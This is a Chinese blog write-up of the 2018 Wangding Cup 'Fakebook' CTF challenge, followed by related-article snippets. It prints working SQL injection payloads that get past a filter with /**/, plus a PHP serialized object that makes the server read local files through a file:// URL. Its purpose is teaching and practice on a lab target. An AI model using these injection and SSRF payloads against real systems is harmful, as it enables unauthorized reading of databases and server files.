[网鼎杯 2018]Fakebook

最新推荐文章于 2024-04-10 14:45:31 发布
最新推荐文章于 2024-04-10 14:45:31 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45708109/article/details/107782523
版权

1.进去先随便注册一个账号,这里注意blog是有限制的,必须http开头。在这里插入图片描述2.点1进去发现url中no存在sql注入,注入发现union被过滤,不过可以使用/**/绕过。可以使用报错注入0/**/union/**/select 1,2,3,4#
在这里插入图片描述根据报错信息可以知道网站的储存目录,以及数据库里的数据都是以序列化方式储存。因此只要访问/var/www/html/flag.php就可以拿到flag,但通过http(s)协议无法读到flag,curl不仅支持http(s),还支持file协议,所以可以通过file协议读文件

这里要通过注入查找数据库里的结构这里贴出大佬博客:
https://blog.csdn.net/qq_42196196/article/details/81952174
我们这里要构造反序列化内容

<?php
class UserInfo  {
    public $name = "test";
    public $age = 1;
    public $blog = "file:///var/www/html/flag.php";
}

$data = new UserInfo();
echo serialize($data);
#O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
?>

payload:

view.php?no=0/**/union/**/select%201,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27%23

在这里插入图片描述查看源码发现有flag.php的base64 解码即可

旸哥哥
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fakebook:Facebook的克隆
05-23
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
[网鼎杯 2018]Fakebook——SSRF/反序列化漏洞/SQL注入
sGanYu
09-29 3442
解法一 解法二 解法三 考点 • 目录扫描 • SSRF • SQL注入 • PHP反序列化 前言:当我们拿到网站的时候,首先需要对这个网站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞 开始之前,先扫描一下该网站下目录,查看有什么敏感信息泄露 直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个
[网鼎杯 2018]Fakebook(思路详细有说明)
weixin_73560599的博客
07-31 535
这题较为综合 涉及了SQL注入以及SSRF和反序列化以及ctf扫目录脚本工具的使用 是一道小综合的题目
[CTF/网络安全]fakebook网鼎杯2018)解题详析
热门推荐
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
[网鼎杯 2018]Fakebook(ssrf漏洞)
qq_44657899的博客
03-16 4520
因为是看了wp才做出来的,所以就直接记录过程和知识点了。 知识点:SSRF SSRF,也就是Server Side RequestForgery—服务器端请求伪造。从字面上来看,与CSRF不同的是,它是服务器端发出的请求伪造而非从用户一端提交。别误会,作为受信任用户,服务器当然不可能做出损害用户信息的事。它是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。因为它是由服务端发起的,所以它能够请...
[网鼎杯 2018]Fakebook1
陈艺秋的博客
06-08 1166
结合起来得出结论,以上代码存在ssrf和反序列化,当我们注册后,把我们的信息序列化一下,然后存进data。注册的其他行数据,差不多都可以乱填,只有一个blog项,估计是后台做了一些限制(必须包含某些字符之类的),随便填会报错。得到关键信息,前面都没有注意这段报错信息,这里包含了一个反序列化函数,和一段路径,后面会用到。路径是之前注入的时候报错爆出来的,序列化值也不用自己生成,之前注入出来了,改长度和值就行。因为出现上面的情况,所以猜测不是字符型注入,用了一点小方法,出现计算,说明是整数型注入。
mp12_social_network_fakebook_person
05-15
Mp12-社交网络(Fakebook)(人)[ManyToMany] 该应用程序将具有一个名为Person的实体,可以通过/ persons端点进行管理。 帖子将添加一个人,获取将显示所有这些人。 为了使一个人与另一个人成为朋友,我们将向终端...
fakebook-backend:学习个人项目探索MERN堆栈
04-10
Fakebook后端(express和mongodb)(这是一个学习/探索MERN堆栈的个人项目)入门: 确保已安装节点克隆仓库在fakebook文件夹中,创建一个带有dev.env文件的配置文件夹设置环境变量:PORT:value,MONGODB_URL = ...
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
假书
facebook-rockin-最佳自动化-selenium-scrape-no-api-tool-bot-machine-made-to-destroy-facebook:Facebook自动化:登录,喜欢,共享,评论,发布,删除。 包含视频“实际中”。 目的主要是通过在Fakebook平台中填充垃圾内容来破坏Fakebook平台(例如,当您决定离开所有这些Fcking平台时,在其中自杀)。 请安装,测试并提交您自己的改进和功能! 谢谢!
03-03
facebook-rockin最佳自动化Selenium消除无api工具的机器人机器做成销毁facebook ... 特征: 一切都是使用Selenium进行的,没有使用API 可见/无头模式 登录 获取/缓存朋友 遍历时间线 给个赞(也是不同的类型) ...
[网鼎杯 2018]Fakebook 1
qq_43618536的博客
07-04 292
BUUCTF的[网鼎杯 2018]Fakebook 1
[网鼎杯 2018]Fakebook1解题思路
xiyuanyue的博客
10-08 242
s:3:"age";s:4:"blog";6、一般flag存储在根目录的flag文件或者flag.php文件修改data 数据O:8:"UserInfo":3:{s:4:"name";s:3:"age";s:4:"blog";
[网鼎杯 2018]Fakebook&[强网杯 2019]随便注&[GYCTF2020]Blacklist
weixin_46133275的博客
08-13 108
不要忘记前面我们是可以看到mysql语句的报错信息的,那么就可以尝试报错注入来获取当前所使用的数据库(不需要使用到select),那么在输入框查询时,就可以直接将数字名表的数据查询出来,不过这里需要注意数字名表中只有一个flag字段,而输入框查询的结果有两个字段,且字段名为。在内的一些函数都被检测了,其实过滤了select的话,一些常规的注入例如:联合查询注入、盲注、报错注入等都无法使用了。个位置,因为我们之前在查users表数据时序列化字符串也是放在第4个位置的,那么应该是第4个位置的数据才会被。
【web | CTF】攻防世界fakebook
weixin_46301214的博客
05-26 618
解题要点 【解题思路】 1)先进行CTF定点目录扫描 2)发现存在flag.php返回303数值 3)根据页面正常注册登录 4)在用户页面测试一下发现存在SQL注入 5)成功注入后,没在数据库里发现flag 6)检测此时数据库用户权限,发现是root 7)利用load_file()读取系统文件flag.php 【难点】 1)检测sql注入是被如何过滤了 2...
BUUCTF——[网鼎杯 2018]Fakebook
Ho1aAs‘s Blog
05-24 395
文章目录利用点解题无 利用点 SQL注入 SSRF读文件 解题 打开环境,没有任何提示,先试试基础功能,注册一个号,回到主页可以点进去看记录 发现URL是拼接上序号的,试试SQL注入,发现是字符型闭合单引号的注入 先看看字段数 无 ...
[网鼎杯 2024]Fakebook,网络安全事件分发机制收藏这一篇就够了
最新发布
2401_84185471的博客
04-10 291
注意:序列化内容要在4号位置,这由column的顺序决定。
FakeBook BUU CTF WP
python_xhb的博客
11-20 549
FakeBook BUU CTF WP
BUUCTF-[网鼎杯 2018]Fakebook
qq_43006864的博客
04-20 1694
打开题目 点击login,一个登陆界面。没啥发现。 点击join。注册一个账号看看。 这里可以看到:http://46021289-6e25-4fee-b4db-f69979ef4362.node4.buuoj.cn:81/view.php?no=1 盲猜可以sql注入。测试了一下,貌似还不需要闭合,直接接语句就可以。 测试出来字段为4,开始尝试获取数据库信息。 貌似有waf,尝试使用/**/绕过。 成功绕过,并且发现注入点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值